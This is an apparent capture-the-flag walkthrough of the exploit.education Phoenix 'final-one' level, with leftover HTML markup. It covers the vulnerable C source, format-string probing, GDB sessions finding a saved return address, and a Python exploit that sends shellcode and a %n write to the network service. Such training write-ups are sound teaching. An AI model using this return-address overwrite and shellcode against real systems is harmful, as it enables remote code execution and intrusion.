Remote format string!<\/p>\n
The description and source code can be found here: I won’t be going into any detail about format string vulnerabilities. So if you’re not familiar with them, check out my solution to the Format Zero<\/a><\/strong> level for a brief overview.<\/p>\n There’s a lot more code to this level than the last one. However, format string bugs are usually pretty easy to find, hence the reason you don’t see them as much anymore. I just look for a call to one of the printf() <\/span>family functions that doesn’t use a format string while printing something from user input. There’s only one that meets these requirements, it’s the last line in the logit() <\/span>function:<\/p>\n logit() <\/span>is called from parser()<\/span>, which is called from main()<\/span>. The parser() <\/span>function shows that there are 2 possible commands; username & login:<\/p>\n I should be able to exploit the format string vulnerability with either the username or login commands. However, the only way I’ll be able to see the results is by running the binary directly and using the “‐‐test<\/span>” argument:<\/p>\n It’s definitely vulnerable. I’m going to try using the “username<\/span>” command to place the pointers and the “login<\/span>” command for the multiple %x<\/span> and %n<\/span> format specifiers. First, I’ll need to play around with it to figure out how many %x’<\/span>s to use before the first %n<\/span>. I’ll do that locally so I can see the output with the “‐‐test<\/span>” argument:<\/p>\n Here, you can see it took 10 %x’<\/span>s to get to the A’s. But it doesn’t line up nicely. The first character of that particular word (4-bytes) is a 0x5b<\/span>, the open bracket ([) character. I’ll need to use three A’s before the pointer.<\/p>\n From here, I’ll switch to using the remote process for debugging. I’ll use GDB to find where the saved return pointer is for the logit() <\/span>function.<\/p>\n Starting the process:<\/p>\n Attaching GDB to the process, setting a breakpoint, and continuing:<\/p>\n Use the commands in the running program:<\/p>\n Check the location of the saved return pointer back in GDB:<\/p>\n Now that I know the saved return pointer is stored at 0xffffdc9c<\/span>, I’ll start writing an exploit script. First, I just want to make sure I can overwrite the saved return point with something<\/em>. Since the end goal is to execute my own shellcode, I’ll put the shellcode in there right away so I can see the smallest value the first byte can be.<\/p>\n I added the time.sleep(0.1)<\/span> line because without it, the first prompt wouldn’t show up as expected. Testing it out:<\/p>\n In another terminal, I attach to the process and set the breakpoint:<\/p>\n I hit Enter to send the payload on the first terminal and reach the breakpoint in GDB. This is right before the call to fprintf()<\/span>, so first I’ll check the contents of the saved return pointer. After stepping to the next instruction, I should see that changed:<\/p>\n Oh crap. A segfault in the printf_core() <\/span>function. And the saved return point never got changed. There may be some differences when running the binary locally vs connecting to the remote process. I’ll try to see what happened:<\/p>\n I checked the instruction that the segfault happened at and see that it’s trying to move the value in EDI to the pointer stored in EAX. I looked at EDI and that’s probably the number of bytes that have been written so far. EAX looks like the pointer it’s going to write to, though, it’s only half write. The first half of the expected pointer is there, but the other half is two A’s. So I’m thinking, all I need to do is remove two A’s to fix the problem.<\/p>\n Testing it out again:<\/p>\n Great success! From here it’s a simple matter to put any value I want in the saved return address pointer. I’ll simply need to point it to the start of my shellcode. For a detailed look at how to write an arbitrary value, check out my solution to the Format Three<\/a><\/strong> level.<\/p>\n
\nhttp:\/\/exploit.education\/phoenix\/final-one\/<\/a><\/p>\n\r\nvoid logit(char *pw) {\r\n char buf[2048];\r\n\r\n snprintf(buf, sizeof(buf), "Login from %s as [%s] with password [%s]\\n",\r\n hostname, username, pw);\r\n\r\n fprintf(output, buf);\r\n}\r\n<\/pre>\n\r\nvoid parser() {\r\n char line[128];\r\n\r\n printf("[final1] $ ");\r\n\r\n while (fgets(line, sizeof(line) - 1, stdin)) {\r\n trim(line);\r\n if (strncmp(line, "username ", 9) == 0) {\r\n strcpy(username, line + 9);\r\n } else if (strncmp(line, "login ", 6) == 0) {\r\n if (username[0] == 0) {\r\n printf("invalid protocol\\n");\r\n } else {\r\n logit(line + 6);\r\n printf("login failed\\n");\r\n }\r\n }\r\n printf("[final1] $ ");\r\n }\r\n}\r\n<\/pre>\n\r\nuser@phoenix-amd64:\/opt\/phoenix\/i486$ .\/final-one --test\r\nWelcome to phoenix\/final-one, brought to you by https:\/\/exploit.education\r\n[final1] $ username %x.%x.%x\r\n[final1] $ login %x.%x.%x\r\nLogin from testing:12121 as [0.0.69676f4c] with password [7266206e.74206d6f.69747365]\r\nlogin failed\r\n<\/pre>\n
\r\nuser@phoenix-amd64:\/opt\/phoenix\/i486$ echo -e "username AAAABBBB\\nlogin %x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x" | .\/final-one --test\r\nWelcome to phoenix\/final-one, brought to you by https:\/\/exploit.education\r\n[final1] $ [final1] $ Login from testing:12121 as [AAAABBBB] with password [0.0.69676f4c.7266206e.74206d6f.69747365.313a676e.31323132.20736120.4141415b.42424241.77205d42]\r\nlogin failed\r\n[final1] $\r\n<\/pre>\n
\r\nuser@phoenix-amd64:~$ nc 127.1 64014\r\nWelcome to phoenix\/final-one, brought to you by https:\/\/exploit.education\r\n[final1] $\r\n<\/pre>\n
\r\nuser@phoenix-amd64:~$ sudo -i\r\n[sudo] password for user:\r\n\r\nroot@phoenix-amd64:~# ps aux | grep final-one\r\nphoenix+ 293 0.6 0.0 736 4 ? Ss 12:00 0:00 \/opt\/phoenix\/i486\/final-one\r\nroot 316 0.0 0.0 6888 984 pts\/1 S+ 12:00 0:00 grep final-one\r\n\r\nroot@phoenix-amd64:~# gdb -q -p 293\r\nGEF for linux ready, type `gef' to start, `gef config' to configure\r\n78 commands loaded for GDB 8.2.1 using Python engine 3.5\r\n[*] 2 commands could not be loaded, run `gef missing` to know why.\r\nAttaching to process 293\r\n...\r\n\r\ngef\u27a4 disas logit\r\nDump of assembler code for function logit:\r\n ...\r\n 0x08048827 <+66>: call 0x80485a0 <fprintf@plt>\r\n 0x0804882c <+71>: add esp,0x10\r\n 0x0804882f <+74>: nop\r\n 0x08048830 <+75>: leave\r\n 0x08048831 <+76>: ret\r\nEnd of assembler dump.\r\n\r\ngef\u27a4 b *logit+66\r\nBreakpoint 1 at 0x8048827\r\n\r\ngef\u27a4 c\r\nContinuing.\r\n<\/pre>\n
\r\nuser@phoenix-amd64:~$ nc 127.1 64014\r\nWelcome to phoenix\/final-one, brought to you by https:\/\/exploit.education\r\n[final1] $ username A\r\n[final1] $ login B\r\n<\/pre>\n
\r\nBreakpoint 1, 0x08048827 in logit ()\r\n...\r\n\r\ngef\u27a4 info frame\r\nStack level 0, frame at 0xffffdca0:\r\n eip = 0x8048827 in logit; saved eip = 0x804892c\r\n called by frame at 0xffffdd40\r\n Arglist at 0xffffdc98, args:\r\n Locals at 0xffffdc98, Previous frame's sp is 0xffffdca0\r\n Saved registers:\r\n ebp at 0xffffdc98, eip at 0xffffdc9c\r\n<\/pre>\n
\r\n#!\/usr\/bin\/env python2\r\n\r\nimport struct\r\nimport socket\r\nimport time\r\n\r\nHOST = "127.0.0.1"\r\nPORT = 64014\r\n\r\n# Stored EIP @ 0xffffdc9c\r\nRET = 0xffffdc9c\r\naddress = struct.pack("I", RET)\r\n\r\n# http:\/\/shell-storm.org\/shellcode\/files\/shellcode-841.php (21 bytes)\r\nshellcode = "\\x31\\xc9\\xf7\\xe1\\xb0\\x0b\\x51\\x68\\x2f\\x2f"\r\nshellcode += "\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\xcd\\x80"\r\n\r\npayload = ""\r\npayload += "username AAA"\r\npayload += address\r\npayload += shellcode\r\npayload += "\\nlogin %x%x%x%x%x%x%x%x%x%x%n"\r\n \r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect((HOST, PORT))\r\n\r\nprint s.recv(1024).strip()\r\ntime.sleep(0.1)\r\nprint s.recv(12).strip()\r\nraw_input("Press Enter to send the payload...")\r\ns.sendall(payload + "\\n")\r\n\r\nwhile True:\r\n print s.recv(1024).strip(),\r\n s.sendall(raw_input() + "\\n")\r\n<\/pre>\n\r\nuser@phoenix-amd64:~$ .\/final-one.py\r\nWelcome to phoenix\/final-one, brought to you by https:\/\/exploit.education\r\n[final1] $\r\nPress Enter to send the payload...\r\n<\/pre>\n
\r\nroot@phoenix-amd64:~# ps aux | grep final-one\r\nuser 2013 2.4 0.9 22352 9308 pts\/0 S+ 13:05 0:00 python2 .\/final-one.py\r\nphoenix+ 2014 0.8 0.0 736 4 ? Ss 13:05 0:00 \/opt\/phoenix\/i486\/final-one\r\nroot 2016 0.0 0.0 6888 984 pts\/1 S+ 13:05 0:00 grep final-one\r\n\r\nroot@phoenix-amd64:~# gdb -q -p 2014\r\n...\r\n\r\ngef\u27a4 b *logit+66\r\nBreakpoint 1 at 0x8048827\r\n\r\ngef\u27a4 c\r\nContinuing.\r\n<\/pre>\n
\r\ngef\u27a4 x 0xffffdc9c\r\n0xffffdc9c: 0x0804892c\r\n\r\ngef\u27a4 n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0xf7fba4a0 in printf_core () from target:\/opt\/phoenix\/i486-linux-musl\/lib\/ld-musl-i386.so.1\r\n...\r\n\r\ngef\u27a4 x 0xffffdc9c\r\n0xffffdc9c: 0x0804892c\r\n<\/pre>\n
\r\ngef\u27a4 x\/i $pc\r\n=> 0xf7fba4a0 <printf_core+1405>: mov DWORD PTR [eax],edi\r\n\r\ngef\u27a4 p\/x $edi\r\n$1 = 0x8e\r\n\r\ngef\u27a4 p\/x $eax\r\n$2 = 0xdc9c4141\r\n<\/pre>\n
\r\nroot@phoenix-amd64:~# ps aux | grep final-one\r\nuser 2208 4.0 0.9 22352 9308 pts\/0 S+ 13:44 0:00 python2 .\/final-one.py\r\nphoenix+ 2209 1.0 0.0 736 4 ? Ss 13:44 0:00 \/opt\/phoenix\/i486\/final-one\r\nroot 2211 0.0 0.0 6888 984 pts\/1 S+ 13:44 0:00 grep final-one\r\n\r\nroot@phoenix-amd64:~# gdb -q -p 2209\r\n...\r\n\r\ngef\u27a4 b *logit+66\r\nBreakpoint 1 at 0x8048827\r\n\r\ngef\u27a4 c\r\nContinuing.\r\n...\r\n\r\nBreakpoint 1, 0x08048827 in logit ()\r\n...\r\n\r\ngef\u27a4 x 0xffffdc9c\r\n0xffffdc9c: 0x0804892c\r\n\r\ngef\u27a4 n\r\n0x0804882c in logit ()\r\n...\r\n\r\ngef\u27a4 x 0xffffdc9c\r\n0xffffdc9c: 0x0000008c\r\n<\/pre>\n